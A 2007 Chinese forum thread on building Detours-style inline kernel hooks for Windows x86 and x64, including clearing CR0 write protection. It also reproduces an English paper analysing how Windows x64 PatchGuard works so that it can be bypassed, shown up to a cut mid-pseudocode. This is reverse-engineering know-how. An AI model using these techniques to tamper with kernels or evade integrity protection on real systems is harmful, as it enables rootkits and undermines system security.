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detours, x86 kernel hook 以及 x64 kernel hook
我假设读者已经非常熟悉detours,阅读此文只是为了增强对detours的理解以及为了实现x64 hook。有关detours原理部分不再多讲。
X86 Kernel Hook 早些年,我把detours1.5移植到x86核心层,工作的不错,我一直用它来hook系统一些内部函数,有时候也用来hook IoCreateFile这类导出函数。让detours1.5在核心工作稳定并不是一件困难的事情。可能有些c/c++的麻烦,但是很快就可以解决。唯一需要注意的地方是detours1.5用VirtualProtect来让内存READ_WRITE_EXECUTE,在核心层有2种方法,第一种是群众所喜闻乐见的清除cr0,第二种是在核心层通过调用native api做VirtualProtect的事情。 detours的方法对比import/export方法有一些很明显的好处,其最大的好处是可以用来hook内部函数。而且由于hook的方法是直接修改函数体,所以不管调用者怎么玩花样,都很难绕过hook。 detours的缺点主要如下: 1,detours x86无法hook小于5字节的函数 2,detours x86需要一个完备的反汇编器和解释器,实际上detours代码中并不包含这个,因此,如果需要写一个函数阻止他人hook,可以这么写: proc near xor eax,eax jeax 1 int 3 ... // do something proc end 注意到这里的这个jmp,因为eax肯定为0,所以该int3不会被调用,而被detours过的代码则很可能走到int3上去了,为了让detours的代码不走到int3,detours必须能够解析出前面3行代码的意思,并且修正jeax 1为jeax 1+(trampoline-function)。用类似的技术,也可以欺骗detours。 3,detours x86无法处理如下函数: proc near flag: ... // 函数前5个字节 .... //do something jmp flag .... // do something proc end 该函数执行体中有一个jmp,跳到前5个字节。可是被detours过之后,该函数的前5个字节被修改了,而且改成了jmp trampoline。为了能够让detours可以处理此操作,必须反汇编解析整个函数体,用2种所描述的方法修改jmp flag。 综上述,detours思路很好,但是存在缺陷,要搞定这些缺陷,需要完整反汇编器。 X64 Kernel Hook 最近有一个需求要在x64下实现类似的hook模块,我找到了detours2.1,给MS发了email,MS的答复是,包含64bit的detours2.1,需要10000 USD。 于是我就删掉了MS的email,开始自己动手来做这个事情了。我大致说一下原理和需要注意的地方。 x64 hook和x86 hook的原理相似,都是修改原函数的首地址。不同的是,x64下不存在 jmp 64_address这种指令,x86下要跨4G跳转,必须是jmp [64_address],对应的汇编码不再是e9 xxxxxxxx,而是ff15 [xxxxxxxx],其中xxxxxxxx保存的是一个64_address。注意xxxxxxxx依然是32位,所以,该内存也必须和function处于同一个4G。 这个限制对于普通的代码编译来说,并不存在太大的问题,因为很少有exe超过4G的。所以编译器生成的代码依然使用e9 xxxxxxxx。对于import的dll来说,通常都是call [xxxxxxxx],以前是这样,现在还是这样,不同的是,[xxxxxxxx]以前指向32位的地址,现在指向64位的地址。这样一来,dll加载的位置和exe所在的位置不在同一个4G也没有关系了。 对于detours来说,受上面所述特性影响的是,trampoline通常位于heap memory/nonpaged pool,new_function位于我们自己所写代码的dll/driver中,old_function位于我们所需要hook的那个模块中。这里面存在一个基本矛盾是,new_function通常和old_function分别处于2个不同dll或者.sys中,系统很可能把他们加载到了距离很远的空间中,也即abs(new_function-old_function)>4G。这样一来,就无法使用e9 xxxxxxxx,而必须使用ff15 [xxxxxxxx]了,而且xxxxxxxx是一个32的偏移,所以[xxxxxxxx]还不能位于我们的dll/sys中。 根据以上的分析,最后可以得出如下算法: 1,找到需要hook的函数地址 2,解析从函数起始地址开始,至少6+8=14个字节的代码。代码不能断开。以上2个过程和detourx86一样,不同的是,detoursx86之需要e9 xxxxxxxx,也就是说只需要5个字节,而我们必须用ff15 [xxxxxxxx]。如果函数体小于14个字节,这意味着该函书无法detours。 不过函数体小于14字节多半是因为里面执行了一个call或者jmp,那么解析该代码,把函数起始地址设置为jmp之后的地址,重新进行2过程。 3,把这14或者15,16...个字节拷贝到预先分配的一块内存中,我们叫它trampoline。 4,把前6个字节改为ff15 [0],也即ff15 00000000 5,在随后的8个字节中保存new_function的起始地址 6,修正trampoline中的14字节的代码,如果里面有jmp,call等跳转语句,修改偏移量,这时候通常又需要跨4G的跳转,那么按照上面的方法修改之,trampoline的字节数可能会增加。 7,在trampoline的代码之后,插入ff15 [0],并且在随后的8个字节中填充old_function+14。 trampoline可以预先分配一个100字节的buffer,初始化全部填充为nop,在进行7的时候,可以从trampoline的底部,也即100-14的位置开始填入ff,15,00,00,00,00, 64_bit_old_function+14(15,16...)。 以上算法的缺点和x86 detours的缺点一样,第一条为无法hook函数体小于14字节的函数。 14个字节相当大,有时候这个缺陷不可忍受,为此,介绍一种更为肮脏的手段。 代码加载到内存中时,通常有很多废空间,也即,在这些空间中,只有nop,或者永远不会执行。用IDA可以找到这些空间。如果能够找到足够大到,以至于可以保存一个64位地址的空间的话,那么可以只修改前5个字节为jmp [xxxxxxxx],同时只拷贝5个字节到trampoline。trampoline的底部14个字节照旧。 以上就是x64下的detours过程。 有一个x64下需要注意的问题,vc8不支持x64下的_asm关键字,所以 _asm{ cli mov eax,cr0 and eax,not 1000h mov cr0,eax }不能再用 取而代之的是 _disable(); uint64 cr0=__readcr0(); cr0 &= 0xfffffffffffeffff; __writecr0(cr0); 当然还可以继续用native api,不过以上方法简洁而且为广大群众所喜闻乐见。有关于_disable等函数,请查阅新版msdn。 至于IA64,我对此一无所知。 顺便说几点: 1,EM64T的cpu上可以run win64os,但是,不知为何,vmware无法在EM64T的cpu上install/run win64os。而amd64 cpu上即便安装的是win32 os,也可以在其上的vmware里install/run win64os。 2,softice已经停止开发,而且不支持x64,只有virtual模式才支持。鉴于其已经停止开发,建议大家都使用windbg。 3,idapro 5.0反汇编x64的代码,错误百出,一团乱麻,基本上需要先U再C。 有问题请发email给我。勿发论坛短信,我偶尔才会上来冒个泡,基本上是收不到论坛短信的。 |
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沙发#
发布于:2007-02-09 14:35
不错,学习了
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板凳#
发布于:2007-02-09 21:22
学习了。。。
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地板#
发布于:2007-02-10 18:40
因为14字节的限制太大,以至于始终觉得不爽。后来想到了一个解决方案。
假设原函数是old_func,新函数是new_func,那么分配trampoline的时候,用某些技术方法,限定分配出的内存和old_func在同一个4G。可以通过VirtualAlloc实现,具体方法可以是多次改变第一个参数,调用VirtualAlloc,直到返回值不为NULL为止。 这样一来,detours的逻辑改变为: 1,首先把old_func的前5个字节拷贝到trampoline+14,然后修改为jmp offset,也即e9 trampoline-5-old 2,trampoline的前6字节为ff15 [0],接下来的8个字节为new_func_address 3,trampoline+14+5之后的5个字节为jmp (trampoline+14+5+5 - (old_func_addr+5)) 这样调用old的时候,会首先执行jmp offset到trampoline,trampoline又jmp到了new_func,new_func调用old的时候,会直接跳到trampoline+14处,执行原来的前5个字节,然后再jmp会原函数体。 如此,一切都完美了 :) |
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地下室#
发布于:2007-02-12 11:47
最重要的是有好点的64位反汇编引擎,还有那该死的PATCHGUARD其他都好办......
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5楼#
发布于:2007-02-28 12:04
有人可以详细说说kernel patch guard吗?
我在win2k3 sp1 64bits上 用前面所说的方法 hook SrvIoCreateFile@srv.sys,没有遇到任何困难和问题,而且工作颇为稳定。 |
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6楼#
发布于:2007-02-28 14:26
找到一篇文章,里面非常详细的描述了patch guard的原理。
http://www.mrspace.net/index.php?job=art&articleid=a_20061211_105134 Bypassing PatchGuard on Windows x64 skape & Skywing Dec 1, 2005 1) Foreword Abstract: The Windows kernel that runs on the x64 platform has introduced a new feature, nicknamed PatchGuard, that is intended to prevent both malicious software and third-party vendors from modifying certain critical operating system structures. These structures include things like specific system images, the SSDT, the IDT, the GDT, and certain critical processor MSRs. This feature is intended to ensure kernel stability by preventing uncondoned behavior, such as hooking. However, it also has the side effect of preventing legitimate products from working properly. For that reason, this paper will serve as an in-depth analysis of PatchGuard's inner workings with an eye toward techniques that can be used to bypass it. Possible solutions will also be proposed for the bypass techniques that are suggested. Thanks: The authors would like to thank westcose, bugcheck, uninformed, Alex Ionescu, Filip Navara, and everyone who is motivated to learn by their own self interest. Disclaimer: The subject matter discussed in this document is presented in the interest of education. The authors cannot be held responsible for how the information is used. While the authors have tried to be as thorough as possible in their analysis, it is possible that they have made one or more mistakes. If a mistake is observed, please contact one or both of the authors so that it can be corrected. 2) Introduction In the caste system of operating systems, the kernel is king. And like most kings, the kernel is capable of defending itself from the lesser citizens, such as user-mode processes, through the castle walls of privilege separation. However, unlike most kings, the kernel is typically unable to defend itself from the same privilege level at which it operates. Without the kernel being able to protect its vital organs at its own privilege level, the entire operating system is left open to modification and subversion if any code is able to run with the same privileges as the kernel itself. As it stands today, most kernel implementations do not provide a mechanism by which critical portions of the kernel can be validated to ensure that they have not been tampered with. If existing kernels were to attempt to deploy something like this in an after-the-fact manner, it should be expected that a large number of problems would be encountered with regard to compatibility. While most kernels intentionally do not document how internal aspects are designed to function, like how system call dispatching works, it is likely that at least one or more third-party vendor may depend on some of the explicit behaviors of the undocumented implementations. This has been exactly the case with Microsoft's operating systems. Starting even in the days of Windows 95, and perhaps even prior to that, Microsoft realized that allowing third-party vendors to twiddle or otherwise play with various critical portions of the kernel lead to nothing but headaches and stability problems, even though it provided the highest level of flexibility. While Microsoft took a stronger stance with Windows NT, it has still become the case that third-party vendors use areas of the kernel that are of particular interest to accomplishing certain feats, even though the means used to accomplish them require the use of undocumented structures and functions. While it's likely that Microsoft realized their fate long ago with regard to losing control over the scope and types of changes they could make to the kernel internally without affecting third-party vendors, their ability to do anything about it has been drastically limited. If Microsoft were to deploy code that happened to prevent major third-party vendors from being able to accomplish their goals without providing an adequate replacement, then Microsoft would be in a world of hurt that would most likely rhyme with antitrust. Even though things have appeared bleak, Microsoft got their chance to reclaim higher levels of flexibility in the kernel with the introduction of the x64 architecture. While some places used x64 to mean both AMD64 and IA64, this document will generally refer to x64 as an alias for AMD64 only, though many of the comments may also apply to IA64. Since the Windows kernel on the x64 architecture operates in 64-bit mode, it stands as a requirement that all kernel-mode drivers also be compiled to run and operate in native 64-bit mode. There are a number of reasons for this that are outside of the scope of this document, but suffice it to say that attempting to design a thunking layer for device drivers that are intended to have any real considerations for performance should be enough to illustrate that doing so would be a horrible idea. By requiring that all device drivers be compiled natively as 64-bit binaries, Microsoft effectively leveled the playing field on the new platform and brought it back to a clean slate. This allowed them to not have to worry about potential compatibility conflicts with existing products because of the simple fact that none had been established. As third-party vendors ported their device drivers to 64-bit mode, any unsupported or uncondoned behavior on the part of the driver could be documented as being prohibited on the x64 architecture, thus forcing the third-party to find an alternative approach if possible. This is the dream of PatchGuard, Microsoft's anti-patch protection system, and it seems logical that such a goal is a reasonable one, but that's not the point of this document. Instead, this document will focus on the changes to the x64 kernel that are designed to protect critical portions of the Windows kernel from being modified. This document will describe how the protection mechanisms are implemented and what areas of the kernel are protected. From there, a couple of different approaches that could be used to disable and bypass the protection mechanisms will be explained in detail as well as potential solutions to the bypass techniques. In conclusion, the reasons and motivations will be summarized and other solutions to the more fundamental problem will be discussed. The real purpose of this document, though, is to illustrate that it is impossible to securely protect regions of code and data through the use of a system that involves monitoring said regions at a privilege level that is equal to the level at which third-party code is capable of running. This fact is something that is well-known, both by Microsoft and by the security population at large, and it should be understood without requiring an explanation. Going toward the future, the operating system world will most likely begin to see a shift toward more granular, hardware-enforced privilege separation by implementing segregated trusted code bases. The questions this will raise with respect to open-source operating systems and DRM issues should slowly begin to increase. Only time will tell. 3) Implementation The anti-patching technology provided in the Windows x64 kernel, nicknamed PatchGuard, is intended to protect critical kernel structures from being modified outside of the context of approved modifications, such as through Microsoft-controlled hot patching. At the time of this writing, PatchGuard is designed to protect the following critical structures: - SSDT (System Service Descriptor Table) - GDT (Global Descriptor Table) - IDT (Interrupt Descriptor Table) - System images (ntoskrnl.exe, ndis.sys, hal.dll) - Processor MSRs (syscall) At a high-level, PatchGuard is implemented in the form of a set of routines that cache known-good copies and/or checksums of structures which are then validated at certain random time intervals (roughly every 5 - 10 minutes). The reason PatchGuard is implemented in a polling fashion rather than in an event-driven or hardware-backed fashion is because there is no native hardware level support for the things that PatchGuard is attempting to accomplish. For that reason, a number of the tricks that PatchGuard resorted to were done so out of necessity. The team that worked on PatchGuard was admittedly very clever. They realized the limitations of implementing an anti-patching model in a fashion described in the introduction and thus were forced to resort to other means by which they might augment the protection mechanisms. In particular, PatchGuard makes extensive use of security through obscurity by using tactics like misdirection, misnamed functions, and general code obfuscation. While many would argue that security through obscurity adds nothing, the authors believe that it's merely a matter of raising the bar high enough so as to eliminate a significant number of people from being able to completely understand something. The code to initialize PatchGuard begins early on in the boot process as part of nt!KeInitSystem. And that's where the fun begins. 3.1) Initializing PatchGuard The initialization of PatchGuard is multi-faceted, but it all has to start somewhere. In this case, the initialization of PatchGuard starts in a function with a symbol name that has nothing to do with anti-patch protections at all. In fact, it's named KiDivide6432 and the only thing that it does is a division operation as shown in the code below: ULONG KiDivide6432( IN ULONG64 Dividend, IN ULONG Divisor) { return Dividend / Divisor; } Though this function may look innocuous, it's actually the first time PatchGuard attempts to use misdirection to hide its actual intentions. In this case, the call to nt!KiDivide6432 is passed a dividend value from nt!KiTestDividend. The divisor is hard-coded to be 0xcb5fa3. It appears that this function is intended to masquerade as some type of division test that ensures that the underlying architecture supports division operations. If the call to the function does not return the expected result of 0x5ee0b7e5, nt!KeInitSystem will bug check the operating system with bug check code 0x5d which is UNSUPPORTED_PROCESSOR as shown below: nt!KeInitSystem+0x158: fffff800`014212c2 488b0d1754d5ff mov rcx,[nt!KiTestDividend] fffff800`014212c9 baa35fcb00 mov edx,0xcb5fa3 fffff800`014212ce e84d000000 call nt!KiDivide6432 fffff800`014212d3 3de5b7e05e cmp eax,0x5ee0b7e5 fffff800`014212d8 0f8519b60100 jne nt!KeInitSystem+0x170 ... nt!KeInitSystem+0x170: fffff800`0143c8f7 b95d000000 mov ecx,0x5d fffff800`0143c8fc e8bf4fc0ff call nt!KeBugCheck When attaching with local kd, the value of nt!KiTestDividend is found to be hardcoded to 0x014b5fa3a053724c such that doing the division operation, 0x014b5fa3a053724c divided by 0xcb5fa3, produces 0x1a11f49ae. That can't be right though, can it? Obviously, the code above indicates that any value other than 0x5ee0b7e5 will lead to a bug check, but it's also equally obvious that the machine does not bug check on boot, so what's going on here? The answer involves a good old fashion case of ingenuity. The result of the the division operation above is a value that is larger than 32 bits. The AMD64 instruction set reference manual indicates that the div instruction will produce a divide error fault when an overflow of the quotient occurs. This means that as long as nt!KiTestDividend is set to the value described above, a divide error fault will be triggered causing a hardware exception that has to be handled by the kernel. This divide error fault is what actually leads to the indirect initialization of the PatchGuard subsystem. Before going down that route, though, it's important to understand one of the interesting aspects of the way Microsoft did this. One of the interesting things about nt!KiTestDividend is that it's actually unioned with an exported symbol that is used to indicate whether or not a debugger is, well, present. This symbol is named nt!KdDebuggerNotPresent and it overlaps with the high-order byte of nt!KiTestDividend as shown below: TestDividend L1 fffff800`011766e0 014b5fa3`a053724c lkd> db nt!KdDebuggerNotPresent L1 fffff800`011766e7 01 The nt!KdDebuggerNotPresent global variable will be set to zero if a debugger is present. If a debugger is not present, the value will be one (default). If the above described division operation is performed while a debugger is attached to the system during boot, which would equate to dividing 0x004b5fa3a053724c by 0xcb5fa3, the resultant quotient will be the expected value of 0x5ee0b7e5. This means that if a debugger is attached to the system prior to the indirect initialization of the PatchGuard protections, then the protections will not be initialized because the divide error fault will not be triggered. This coincides with the documented behavior and is intended to allow driver developers to continue to be able to set breakpoints and perform other actions that may indirectly modify monitored regions of the kernel in a debugging environment. However, this only works if the debugger is attached to the system during boot. If a developer subsequently attaches a debugger after PatchGuard has initialized, then the act of setting breakpoints or performing other actions may lead to a bluescreen as a result of PatchGuard detecting the alterations. Microsoft's choice to initialize PatchGuard in this manner allows it to transparently disable protections when a debugger is attached and also acts as a means of hiding the true initialization vector. With the unioned aspect of nt!KiTestDividend understood, the next step is to understand how the divide error fault actually leads to the initialization of the PatchGuard subsystem. For this aspect it is necessary to start at the places that all divide error faults go: nt!KiDivideErrorFault. The indirect triggering of nt!KiDivideErrorFault leads to a series of function calls that eventually result in nt!KiOpDiv being called to handle the divide error fault for the div instruction. The nt!KiOpDiv routine appears to be responsible for preprocessing the different kinds of divide errors, like divide by zero. Although it may look normal at first glance, nt!KiOpDiv also has a darker side. The stack trace that leads to the calling of nt!KiOpDiv is shown below. For those curious as to how the authors were able to debug the PatchGuard initialization vector that is intended to be disabled when a debugger is attached, one method is to simply break on the div instruction in nt!KiDivide6432 and change r8d to zero. This will generate the divide error fault and lead to the calling of the PatchGuard initialization routines. In order to allow the machine to boot normally, a breakpoint must be set on nt!KiDivide6432 after the fact to automatically restore r8d to 0xcb5fa3: kd> k Child-SP RetAddr Call Site fffffadf`e4a15f90 fffff800`010144d4 nt!KiOp_Div+0x29 fffffadf`e4a15fe0 fffff800`01058d75 nt!KiPreprocessFault+0xc7 fffffadf`e4a16080 fffff800`0104172f nt!KiDispatchException+0x85 fffffadf`e4a16680 fffff800`0103f5b7 nt!KiExceptionExit fffffadf`e4a16800 fffff800`0142132b nt!KiDivideErrorFault+0xb7 fffffadf`e4a16998 fffff800`014212d3 nt!KiDivide6432+0xb fffffadf`e4a169a0 fffff800`0142a226 nt!KeInitSystem+0x169 fffffadf`e4a16a50 fffff800`01243e09 nt!Phase1InitializationDiscard+0x93e fffffadf`e4a16d40 fffff800`012b226e nt!Phase1Initialization+0x9 fffffadf`e4a16d70 fffff800`01044416 nt!PspSystemThreadStartup+0x3e fffffadf`e4a16dd0 00000000`00000000 nt!KxStartSystemThread+0x16 The first thing that nt!KiOpDiv does prior to processing the actual divide fault is to call a function named nt!KiFilterFiberContext. This function seems oddly named not only in the general sense but also in the specific context of a routine that is intended to be dealing with divide faults. By looking at the body of nt!KiFilterFiberContext, its intentions quickly become clear: nt!KiFilterFiberContext: fffff800`01003ac2 53 push rbx fffff800`01003ac3 4883ec20 sub rsp,0x20 fffff800`01003ac7 488d0552d84100 lea rax,[nt!KiDivide6432] fffff800`01003ace 488bd9 mov rbx,rcx fffff800`01003ad1 4883c00b add rax,0xb fffff800`01003ad5 483981f8000000 cmp [rcx+0xf8],rax fffff800`01003adc 0f855d380c00 jne nt!KiFilterFiberContext+0x1d fffff800`01003ae2 e899fa4100 call nt!KiDivide6432+0x570 It appears that this chunk of code is designed to see if the address that the fault error occurred at is equal to nt!KiDivide6432 + 0xb. If one adds 0xb to nt!KiDivide6432 and disassembles the instruction at that address, the result is: nt!KiDivide6432+0xb: fffff800`0142132b 41f7f0 div r8d This coincides with what one would expect to occur when the quotient overflow condition occurs. According to the disassembly above, if the fault address is equal to nt!KiDivide6432 + 0xb, then an unnamed symbol is called at nt!KiDivide6432 + 0x570. This unnamed symbol will henceforth be referred to as nt!KiInitializePatchGuard, and it is what drives the set up of the PatchGuard subsystem. The nt!KiInitializePatchGuard routine itself is quite large. It handles the initialization of the contexts that will monitor certain system images, the SSDT, processor GDT/IDT, certain critical MSRs, and certain debugger-related routines. The very first thing that the initialization routine does is to check to see if the machine is being booted in safe mode. If it is being booted in safe mode, the PatchGuard subsystem will not be enabled as shown below: nt!KiDivide6432+0x570: fffff800`01423580 4881ecd8020000 sub rsp,0x2d8 fffff800`01423587 833d22dfd7ff00 cmp dword ptr [nt!InitSafeBootMode],0x0 fffff800`0142358e 0f8504770000 jne nt!KiDivide6432+0x580 ... nt!KiDivide6432+0x580: fffff800`0142ac98 b001 mov al,0x1 fffff800`0142ac9a 4881c4d8020000 add rsp,0x2d8 fffff800`0142aca1 c3 ret Once the safe mode check has passed, nt!KiInitializePatchGuard begins the PatchGuard initialization by calculating the size of the INITKDBG section in ntoskrnl.exe. It accomplishes this by passing the address of a symbol found within that section, nt!FsRtlUninitializeSmallMcb, to nt!RtlPcToFileHeader. This routine passes back the base address of nt in an output parameter that is subsequently passed to nt!RtlImageNtHeader. This method returns a pointer to the image's IMAGENTHEADERS structure. From there, the virtual address of nt!FsRtlUninitializeSmallMcb is calculated by subtracting the base address of nt from it. The calculated RVA is then passed to nt!RtlSectionTableFromVirtualAddress which returns a pointer to the image section that nt!FsRtlUninitializeSmallMcb resides in. The debugger output below shows what rax points to after obtaining the image section structure: kd> ? rax Evaluate expression: -8796076244456 = fffff800`01000218 kd> dt nt!_IMAGE_SECTION_HEADER fffff800`01000218 +0x000 Name : [8] "INITKDBG" +0x008 Misc : <unnamed-tag> +0x00c VirtualAddress : 0x165000 +0x010 SizeOfRawData : 0x2600 +0x014 PointerToRawData : 0x163a00 +0x018 PointerToRelocations : 0 +0x01c PointerToLinenumbers : 0 +0x020 NumberOfRelocations : 0 +0x022 NumberOfLinenumbers : 0 +0x024 Characteristics : 0x68000020 The whole reason behind this initial image section lookup has to do with one of the ways in which PatchGuard obfuscates and hides the code that it executes. In this case, code within the INITKDBG section will eventually be copied into an allocated protection context that will be used during the validation phase. The reason that this is necessary will be discussed in more detail later. After collecting information about the INITKDBG image section, the PatchGuard initialization routine performs the first of many pseudo-random number generations. This code can be seen throughout the PatchGuard functions and has a form that is similar to the code shown below: fffff800`0142362d 0f31 rdtsc fffff800`0142362f 488bac24d8020000 mov rbp,[rsp+0x2d8] fffff800`01423637 48c1e220 shl rdx,0x20 fffff800`0142363b 49bf0120000480001070 mov r15,0x7010008004002001 fffff800`01423645 480bc2 or rax,rdx fffff800`01423648 488bcd mov rcx,rbp fffff800`0142364b 4833c8 xor rcx,rax fffff800`0142364e 488d442478 lea rax,[rsp+0x78] fffff800`01423653 4833c8 xor rcx,rax fffff800`01423656 488bc1 mov rax,rcx fffff800`01423659 48c1c803 ror rax,0x3 fffff800`0142365d 4833c8 xor rcx,rax fffff800`01423660 498bc7 mov rax,r15 fffff800`01423663 48f7e1 mul rcx fffff800`01423666 4889442478 mov [rsp+0x78],rax fffff800`0142366b 488bca mov rcx,rdx fffff800`0142366e 4889942488000000 mov [rsp+0x88],rdx fffff800`01423676 4833c8 xor rcx,rax fffff800`01423679 48b88fe3388ee3388ee3 mov rax,0xe38e38e38e38e38f fffff800`01423683 48f7e1 mul rcx fffff800`01423686 48c1ea03 shr rdx,0x3 fffff800`0142368a 488d04d2 lea rax,[rdx+rdx*8] fffff800`0142368e 482bc8 sub rcx,rax fffff800`01423691 8bc1 mov eax,ecx This pseudo-random number generator uses the rdtsc instruction as a seed and then proceeds to perform various bitwise and multiplication operations until the end result is produced in eax. The result of this first random number generator is used to index an array of pool tags that are used for PatchGuard memory allocations. This is an example of one of the many ways in which PatchGuard attempts to make it harder to find its own internal data structures in memory. In this case, it adopts a random legitimate pool tag in an effort to blend in with other memory allocations. The code block below shows how the pool tag array is indexed and where it can be found in memory: fffff800`01423693 488d0d66c9bdff lea rcx,[nt] fffff800`0142369a 448b848100044300 mov r8d,[rcx+rax*4+0x430400] In this case, the random number is stored in the rax register which is used to index the array of pool tags found at nt+0x430400. The fact that the array is referenced indirectly might be seen as another attempt at obfuscation in a bid to make what is occurring less obvious at a glance. If the pool tag array address is dumped in the debugger, all of the pool tags that could possibly be used by PatchGuard can be seen: lkd> db nt+0x430400 41 63 70 53 46 69 6c 65-49 70 46 49 49 72 70 20 AcpSFileIpFIIrp 4d 75 74 61 4e 74 46 73-4e 74 72 66 53 65 6d 61 MutaNtFsNtrfSema 54 43 50 63 00 00 00 00-10 3b 03 01 00 f8 ff ff TCPc.....;...... After the fake pool tag has been selected from the array at random, the PatchGuard initialization routine proceeds by allocating a random amount of storage that is bounded at a minimum by the virtual size of the INITKDBG section plus 0x1b8 and at a maximum by the minimum plus 0x7ff. The magic value 0x1b8 that is expressed in the minimum size is actually the size of the data structure that is used by PatchGuard to store context-specific protection information, as will be shown later. The fake pool tag and the random size are then used to allocate storage from the NonPagedPool as shown in the pseudo-code below: Context = ExAllocatePoolWithTag( NonPagedPool, (InitKdbgSection->VirtualSize + 0x1b8) + (RandSize & 0x7ff), PoolTagArray[RandomPoolTagIndex]); If the allocation of the context succeeds, the initialization routine zeroes its contents and then starts initializing some of the structure's attributes. The context returned by the allocation will henceforth be referred to as a structure of type PATCHGUARD_CONTEXT. The first 0x48 bytes of the structure are actually composed of code that is copied from the misleading symbol named nt!CmpAppendDllSection. This function is actually used to decrypt the structure at runtime, as will be seen later. After nt!CmpAppendDllSection is copied to the first 0x48 bytes of the data structure, the initialization routine sets up a number of function pointers that are stored within the structure. The routines that it stores the addresses of and the offsets within the PatchGuard context data structure are shown below. +--------+-------------------------------------------+ | Offset | Symbol | +--------+-------------------------------------------+ | 0x48 | nt!ExAcquireResourceSharedLite | | 0x50 | nt!ExAllocatePoolWithTag | | 0x58 | nt!ExFreePool | | 0x60 | nt!ExMapHandleToPointer | | 0x68 | nt!ExQueueWorkItem | | 0x70 | nt!ExReleaseResourceLite | | 0x78 | nt!ExUnlockHandleTableEntry | | 0x80 | nt!ExAcquireGuardedMutex | | 0x88 | nt!ObDereferenceObjectEx | | 0x90 | nt!KeBugCheckEx | | 0x98 | nt!KeInitializeDpc | | 0xa0 | nt!KeLeaveCriticalRegion | | 0xa8 | nt!KeReleaseGuardedMutex | | 0xb0 | nt!ObDereferenceObjectEx2 | | 0xb8 | nt!KeSetAffinityThread | | 0xc0 | nt!KeSetTimer | | 0xc8 | nt!RtlImageDirectoryEntryToData | | 0xd0 | nt!RtlImageNtHeaders | | 0xd8 | nt!RtlLookupFunctionEntry | | 0xe0 | nt!RtlSectionTableFromVirtualAddress | | 0xe8 | nt!KiOpPrefetchPatchCount | | 0xf0 | nt!KiProcessListHead | | 0xf8 | nt!KiProcessListLock | | 0x100 | nt!PsActiveProcessHead | | 0x108 | nt!PsLoadedModuleList | | 0x110 | nt!PsLoadedModuleResource | | 0x118 | nt!PspActiveProcessMutex | | 0x120 | nt!PspCidTable | +--------+-------------------------------------------+ PATCHGUARD_CONTEXT function pointers The reason that PatchGuard uses function pointers instead of calling the symbols directly is most likely due to the relative addressing mode used in x64. Since the PatchGuard code runs dynamically from unpredictable addresses, it would be impossible to use the relative addressing mode without having to fix up instructions -- a task that would no doubt be painful and not really worth the trouble. The authors do not see any particular advantage gained in terms of obfuscation by the use of function pointers stored in the PatchGuard context structure. After all of the function pointers have been set up, the initialization routine proceeds by picking another random pool tag that is used for subsequent allocations and stores it at offset 0x188 within the PatchGuard context structure. After that, two more random numbers are generated, both of which are used later on during the encryption phase of the structure. One is used as a random number of rotate bits, the other is used as an XOR seed. The XOR seed is stored at offset 0x190 and the random rotate bits value is stored at offset 0x18c. The next step taken by the initialization routine is to acquire the number of bits that can be used to represent the virtual address space by querying the processor via through the cpuid ExtendedAddressSize (0x80000008) extended function. The result is stored at offset 0x1b4 within the PatchGuard context structure. Finally, the last major step before initializing the individual protection sub-contexts is the copying of the contents of the INITKDBG section to the allocated PatchGuard context structure. The copy operation looks something like the pseudo code below: memmove( (PCHAR)PatchGuardContext + sizeof(PATCHGUARD_CONTEXT), NtImageBase + InitKdbgSection->VirtualAddress, InitKdbgSection->VirtualSize); With the primary portions of the PatchGuard context structure initialized, the next logical step is to initialize the sub-contexts that are specific to the things that are actually being protected. 3.2) Protected Structure Initialization The structures that PatchGuard protects are represented by individual sub-context structures. These structures are composed at the beginning by the contents of the parent PatchGuard structure (PATCHGUARD_CONTEXT). This includes the function pointers and other values assigned to the parent. The sub-contexts are identified by general types that provide the validation routine with something to key off of. This section will explain how each of the individual structures have their protection sub-contexts initialized. At the time of this writing, the structures have their protection sub-contexts initialized in the order described below: - System images - SSDT - GDT/IDT/MSRs - Debug routines After all the sub-contexts have been initialized, the parent protection context is XOR'd and a timer is initialized and set. The purpose of this timer, as will be shown, is to run the validation half of the PatchGuard subsystem on the data that is collected. Aside from the specific protection sub-contexts listed in the following subsections, it was observed by the authors that the routine that initializes the PatchGuard subsystem also allocated sub-context structures of types that could not be immediately discerned. In particular, these types had the sub-context identifiers of 0x4 and 0x5. 3.2.1) System Images The protection of certain key kernel images is one of the more critical aspects of PatchGuard's protection schemes. If a driver were still able to hook functions in nt, ndis, or any other key kernel components, then PatchGuard would be mostly irrelevant. In order to address this concern, PatchGuard performs a set of operations that are intended to ensure that system images cannot be tampered with. The table in figure shows which kernel images are currently protected by this scheme. +--------------+ | Image Name | +--------------+ | ntoskrnl.exe | | hal.dll | | ndis.sys | +--------------+ Protected kernel images The approach taken to protect each of these images is the same. To kick things off, the address of a symbol that resides within the image is passed to a PatchGuard sub-routine that will be referred to as nt!PgCreateImageSubContext. This routine is prototyped as shown below: NTSTATUS PgCreateImageSubContext( IN PPATCHGUARD_CONTEXT ParentContext, IN LPVOID SymbolAddress); For ntoskrnl.exe, the address of nt!KiFilterFiberContext is passed in as the symbol address. For hal.dll, the address of HalInitializeProcessor is passed. Finally, the address passed for ndis.sys is its entry point address which is obtained through a call to nt!GetModuleEntryPoint. Inside nt!PgCreateImageSubContext, the basic approach taken to protect the images is through the generation of a few distinct PatchGuard sub-contexts. The first sub-context is designed to hold the checksum of an individual image's sections, with a few exceptions. The second and third sub-contexts hold the checksum of an image's Import Address Table (IAT) and Import Directory, respectively. These routines all make use of a shared routine that is responsible for generating a protection sub-context that holds the checksum for a block of memory using the random XOR key and random rotate bits stored in the parent PatchGuard context structure. The prototype for this routine is shown below: typedef struct BLOCK_CHECKSUM_STATE { ULONG Unknown; ULONG64 BaseAddress; ULONG BlockSize; ULONG Checksum; } BLOCK_CHECKSUM_STATE, *PBLOCK_CHECKSUM_STATE; PPATCHGUARD_SUB_CONTEXT PgCreateBlockChecksumSubContext( IN PPATCHGUARD_CONTEXT Context, IN ULONG Unknown, IN PVOID BlockAddress, IN ULONG BlockSize, IN ULONG SubContextSize, OUT PBLOCK_CHECKSUM_STATE ChecksumState OPTIONAL); The block checksum sub-context stores the checksum state at the end of the PATCHGUARDC_ONTEXT. The checksum state is stored in a BLOCK_CHECKSUM_STATE structure. The Unknown attribute of the structure is initialized to the Unknown parameter from nt!PgCreateBlockChecksumSubContext. The purpose of this field was not deduced, but the value was set to zero during debugging. The checksum algorithm used by the routine is fairly simple. The pseudo-code below shows how it works conceptually: ULONG64 Checksum = Context->RandomHashXorSeed; ULONG Checksum32; // Checksum 64-bit blocks while (BlockSize >= 